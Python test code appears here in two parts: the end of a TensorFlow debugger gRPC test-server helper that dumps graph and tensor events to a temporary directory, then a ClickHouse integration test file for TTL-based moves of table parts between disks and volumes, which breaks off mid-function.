grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
def on_graph_def(self, graph_def, device_name, wall_time):
"""Implementation of the tensor value-carrying Event proto callback.
Args:
graph_def: A GraphDef object.
device_name: Name of the device on which the graph was created.
wall_time: An epoch timestamp (in microseconds) for the graph.
"""
if self._dump_dir:
if self._grpc_path:
self._write_graph_def(graph_def, device_name, wall_time)
else:
self._cached_graph_defs.append(graph_def)
self._cached_graph_def_device_names.append(device_name)
self._cached_graph_def_wall_times.append(wall_time)
else:
self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
debug_data.load_tensor_from_event(event))
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(summary_metadata.plugin_data[0].content)
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
"""An implementation of EventListenerBaseServicer for testing."""
def __init__(self, server_port, dump_dir):
"""Constructor of EventListenerTestServicer.
Args:
server_port: (int) The server port number.
dump_dir: (str) The root directory to which the data files will be
dumped. If empty or None, the received debug data will not be dumped
to the file system: they will be stored in memory instead.
"""
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
grpc_debug_server.EventListenerBaseServicer.__init__(
self, server_port,
functools.partial(EventListenerTestStreamHandler, dump_dir, self))
def clear_data(self):
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
def start_server_on_separate_thread(dump_to_filesystem=True,
server_start_delay_sec=0.0,
poll_server=False):
"""Create a test gRPC debug server and run on a separate thread.
Args:
dump_to_filesystem: (bool) whether the debug server will dump debug data
to the filesystem.
server_start_delay_sec: (float) amount of time (in sec) to delay the server
start up for.
poll_server: (bool) whether the server will be polled till success on
startup.
Returns:
server_port: (int) Port on which the server runs.
debug_server_url: (str) grpc:// URL to the server.
server_dump_dir: (str) The debug server's dump directory.
server_thread: The server Thread object.
server: The `EventListenerTestServicer` object.
Raises:
ValueError: If polling the server process for ready state is not successful
within maximum polling count.
"""
server_port = portpicker.pick_unused_port()
debug_server_url = "grpc://localhost:%d" % server_port
server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
server = EventListenerTestServicer(server_port=server_port,
dump_dir=server_dump_dir)
def delay_then_run_server():
time.sleep(server_start_delay_sec)
server.run_server()
server_thread = threading.Thread(target=delay_then_run_server)
server_thread.start()
if poll_server:
if not _poll_server_till_success(
50,
0.2,
debug_server_url,
server_dump_dir,
server,
gpu_memory_fraction=0.1):
raise ValueError(
"Failed to start test gRPC debug server at port %d" % server_port)
server.clear_data()
return server_port, debug_server_url, server_dump_dir, server_thread, server
def _poll_server_till_success(max_attempts,
sleep_per_poll_sec,
debug_server_url,
dump_dir,
server,
gpu_memory_fraction=1.0):
"""Poll server until success or exceeding max polling count.
Args:
max_attempts: (int) How many times to poll at maximum
sleep_per_poll_sec: (float) How many seconds to sleep for after each
unsuccessful poll.
debug_server_url: (str) gRPC URL to the debug server.
dump_dir: (str) Dump directory to look for files in. If None, will directly
check data from the server object.
server: The server object.
gpu_memory_fraction: (float) Fraction of GPU memory to be
allocated for the Session used in server polling.
Returns:
(bool) Whether the polling succeeded within max_polls attempts.
"""
poll_count = 0
config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
per_process_gpu_memory_fraction=gpu_memory_fraction))
with session.Session(config=config) as sess:
for poll_count in range(max_attempts):
server.clear_data()
print("Polling: poll_count = %d" % poll_count)
x_init_name = "x_init_%d" % poll_count
x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
x = variables.Variable(x_init, name=x_init_name)
run_options = config_pb2.RunOptions()
debug_utils.add_debug_tensor_watch(
run_options, x_init_name, 0, debug_urls=[debug_server_url])
try:
sess.run(x.initializer, options=run_options)
except errors.FailedPreconditionError:
pass
if dump_dir:
if os.path.isdir(
dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
shutil.rmtree(dump_dir)
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
else:
if server.debug_tensor_values:
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
return False
|
test.py
|
import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def get_random_string(length):
symbols = bytes(string.ascii_uppercase + string.digits)
result_list = bytearray([0])*length
for i in range(length):
result_list[i] = random.choice(symbols)
return str(result_list)
def get_used_disks_for_table(node, table_name):
return node.query("select disk_name from system.parts where table == '{}' and active=1 order by modification_time".format(table_name)).strip().split('\n')
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination","MergeTree()",0),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",0),
("mt_test_rule_with_invalid_destination","MergeTree()",1),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')",0),
("mt_test_inserts_to_disk_work","MergeTree()",1),
("replicated_mt_test_inserts_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')",1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')",0),
("mt_test_moves_to_disk_work","MergeTree()",1),
("replicated_mt_test_moves_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')",1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 6
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work","MergeTree()"),
("replicated_mt_test_moves_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_volume_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')",0),
("mt_test_inserts_to_volume_work","MergeTree()",1),
("replicated_mt_test_inserts_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')",1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work","MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {}".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_merges_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')",0),
("mt_test_merges_to_disk_work","MergeTree()",1),
("replicated_mt_test_merges_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')",1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 10
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work","MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"} # Merged to the same disk against the rule.
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_after_merges_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')",0),
("mt_test_moves_after_merges_work","MergeTree()",1),
("replicated_mt_test_moves_after_merges_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')",1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"DELETE"),
("mt_test_moves_after_alter_work","MergeTree()",1,"DELETE"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"DELETE"),
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"TO DISK 'external'"),
("mt_test_moves_after_alter_work","MergeTree()",1,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 30 SECOND TO DISK 'jbod2',
d1 + INTERVAL 60 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 5 SECOND TO VOLUME 'external',
d1 + INTERVAL 10 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["0"] if positive else ["3"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt","MergeTree()"),
("concurrently_altering_ttl_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException as ex:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'", "TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
def optimize_table(num):
for i in range(num):
